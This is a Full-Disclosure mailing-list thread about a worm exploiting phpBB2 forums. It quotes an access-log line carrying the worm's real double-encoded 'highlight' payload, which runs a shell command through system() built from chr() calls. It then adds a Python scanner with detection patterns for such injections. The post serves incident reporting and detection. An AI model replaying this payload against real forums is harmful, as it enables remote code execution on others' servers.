
[Full-Disclosure] Re: Worm hitting PHPbb2 Forums



From what I have read, this can happen in any phpbb version lower than 2.0.11

This exploit is becoming frequent.  Normally it uploads a DDoS bot.

Mark

Quoting "L. Walker" <lwalker@xxxxxxxxxxx>:

> Just spotted two clients hit by this.  One client didn't update his
> software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16. 
> Chkrootkit says it's Adore, however could be something else.  Datacenter
> wasn't very smart and has since wiped the server, so no binaries or other
> evidence.
> 
> Generation 12 only wiped out PHP files, replacing them with its own
> message on the other client's PHPbb2 forum.  Access logs show:
> 
> 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
> /forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527
> HTTP/1.0" 200 270
> "http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 
> --
> L. Walker <lwalker at magi dot net dot au>
> Network Administrator / Consultant
> --
> 




----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
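The access-log line quoted above shows the detail that matters for anyone scanning logs for this worm: the `highlight` value is percent-encoded twice (`%2527` becomes `%27` after one decode and only then a quote character, `%252e` likewise becomes `.`), so a filter or log search that decodes once sees nothing resembling PHP code. The following is an added example, not code from either poster: a small Python log scanner that decodes the `highlight` parameter to a fixed point and flags values containing `system(` / `chr(` / quote-and-dot fragments that a genuine search term never carries. The two log lines are constructed for this example (the first carries a much shorter payload of the same shape, the second is a normal search), and the function names are this example's own.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample access-log lines (not from the original post). The first
# mimics the double-URL-encoded "highlight" pattern seen in the thread with a
# short stand-in payload; the second is an ordinary forum search highlight.
SAMPLE_LOG = """\
198.51.100.7 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?p=1445&highlight=%2527%252Esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.0" 200 270 "-" "Mozilla/4.0"
198.51.100.8 - - [21/Dec/2004:18:09:02 +1100] "GET /forum/viewtopic.php?p=1445&highlight=phpbb HTTP/1.0" 200 4120 "-" "Mozilla/4.0"
"""

# Pull the request target out of a Common/Combined Log Format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Fragments that appear only when the highlight value has been turned into
# PHP code (function calls, or a quote followed by the concatenation dot).
SUSPICIOUS = re.compile(r"system\s*\(|chr\s*\(|\.\s*system|'\s*\.", re.IGNORECASE)


def full_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing, so %2527 -> %27 -> ' is reached.

    A bounded loop keeps a pathological input from spinning forever.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_highlight(line):
    """Return (is_suspicious, decoded_highlight) for one access-log line.

    Lines without a parsable request or without a highlight parameter
    yield (False, None).
    """
    m = REQUEST_RE.search(line)
    if not m:
        return False, None
    # parse_qs performs the first decode round; full_decode handles the rest.
    qs = parse_qs(urlparse(m.group("target")).query, keep_blank_values=True)
    values = qs.get("highlight")
    if not values:
        return False, None
    decoded = full_decode(values[0])
    return bool(SUSPICIOUS.search(decoded)), decoded


def scan_log(text):
    """Return the fully decoded highlight values flagged as injection attempts."""
    results = (inspect_highlight(line) for line in text.splitlines())
    return [decoded for flagged, decoded in results if flagged]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious highlight value:", hit)
```

Decoding to a fixed point rather than once is the whole point of the scanner; the same idea applies to any WAF or input filter placed in front of the forum, since a check that runs before the application's own decode pass will otherwise never see the quote that closes the string.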

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html